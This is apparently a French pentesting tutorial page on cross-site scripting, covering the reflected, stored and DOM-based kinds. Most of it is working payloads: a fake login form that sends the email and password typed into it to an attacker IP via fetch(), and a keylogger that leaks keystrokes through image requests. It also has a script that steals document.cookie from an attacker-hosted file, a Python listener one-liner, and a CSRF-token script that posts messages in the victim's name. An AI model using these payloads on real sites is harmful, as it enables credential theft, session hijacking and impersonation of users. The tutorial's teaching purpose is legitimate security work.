XSS - Techniques - Pentesting Web

XSS (Reflected) :

Réfléchi (Reflected) : Ce type de XSS se produit lorsque les données fournies par l'utilisateur sont reflétées dans la réponse HTTP sans être correctement vérifiées. Cela permet à un attaquant d'injecter du code malveillant dans la réponse, qui est ensuite exécuté dans le navigateur de l'utilisateur.

Dans ce cas, nous pouvons injecter du code HTML comme dans l'exemple suivant test <h1> Test </h1> :

Nous pouvons constater que nous avons pu modifier la taille du texte avec la balise h1 :

XSS (Stored) :

Stocké (Stored) : Ce type de XSS se produit lorsqu'un attaquant est capable de stocker du code malveillant dans une base de données ou sur le serveur web qui héberge une page web vulnérable. Ce code est exécuté chaque fois que la page est chargée.

Si nous lançons un script comme le suivant dans un formulaire : <script>alert("XSS")</script> et que nous obtenons l'alerte suivante, cela signifie que l'utilisateur sur le site web est vulnérable à ce type d'attaque :

Nous pourrions rediriger l'utilisateur vers un site web vulnérable et effectuer une attaque de phishing :

<script>
window.location.href = "https://maliciouswebsite.com";
</script>

Ce code JavaScript crée un formulaire de connexion sur une page web et envoie les données saisies (adresse e-mail et mot de passe) à une adresse IP spécifique via une requête HTTP en utilisant fetch().

<div id="formContainer"></div>

<script>
    var email;
    var password;
    var form = '<form>' + 
    'Email: <input type="email" id="email" required>' +
    ' Password: <input type="password" id="password" required>'+
    '<input type="button" onclick="submitForm()" value="Submit">' + 
    '</form>';

    document.getElementById("formContainer").innerHTML = form;

    function submitForm() {
        email = document.getElementById("email").value;
        password = document.getElementById("password").value;
        fetch("http://192.168.71.128/?email=" + email + "&password=" + password);
    }
</script>

Nous écouterions sur le port 80 avec python3 :

python3 -m http.server 80

XSS (Basé sur le DOM) :

Basé sur le DOM : Ce type de XSS se produit lorsque le code malveillant s'exécute dans le navigateur de l'utilisateur via le DOM (Document Object Model). Cela se produit lorsque le code JavaScript sur une page web modifie le DOM de manière vulnérable à l'injection de code malveillant.

Le script suivant serait capable de capturer toutes les frappes de clavier de l'utilisateur et de nous les envoyer sur un serveur python3 via le port 80 :

<script>
	var k = "";
	document.onkeypress = function(e){
		e = e || window.event;
		k += e.key;
		var i = new Image();
		i.src = "http://192.168.71.128/" + k;
	}
</script>

Nous pouvons écouter en filtrant uniquement les caractères qui nous intéressent avec grep :

python3 -m http.server 80 2>&1 | grep -oP 'GET /\K[^.*\s]+' | sed 's/%20//g'

Pour obtenir le cookie de session depuis un serveur tiers, nous créerions ce fichier sur notre ordinateur test.js

var request = new XMLHttpRequest();
request.open('GET', 'http://192.168.71.128/?cookie=' + document.cookie);
request.send();

Dans le formulaire, nous enverrions ce script :

<script src="http://192.168.71.128/test.js"></script>

Nous écoutons et obtenons le cookie de session de l'utilisateur :

Pour écrire quelque chose au nom d'une autre personne, nous pourrions suivre les étapes suivantes :

Intercepter la requête avec Burpsuite et copier le contenu encadré en rouge :

Le script suivant effectue une opération GET vers une URL locale, analyse la réponse HTML pour identifier un jeton CSRF, puis effectue une opération POST avec certaines données, en incorporant le jeton CSRF, vers la même URL. La variable 'data', encodée au format URL, transmettra les informations au serveur où ce script est implémenté. Il est essentiel de souligner qu'il est nécessaire de modifier les valeurs de 'data', du jeton et de l'adresse IP.

var domain = "http://localhost:10007/newgossip";
var req1 = new XMLHttpRequest();
req1.open('GET', domain, false);
req1.withCredentials = true;
req1.send();

var response = req1.responseText;
var parser = new DOMParser();
var doc = parser.parseFromString(response, 'text/html');
var token = doc.getElementsByName("_csrf_token")[0].value;

var req2 = new XMLHttpRequest();
var data = "title=My%20boss%20is%20a%20bastard%21%21&subtitle=I%20hate%20my%20job&text=you%20make%20me%20SICK%0A&_csrf_token=" + token; 
req2.open('POST', 'http://localhost:10007/newgossip', false);
req2.withCredentials = true;
req2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); 
req2.send(data);

Dans le formulaire, nous enverrions ce script :

<script src="http://192.168.71.128/pwned.js"><script>

Nous écoutons sur le port 80 avec python3 :

Le message envoyé au nom d'un autre a été transmis :

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?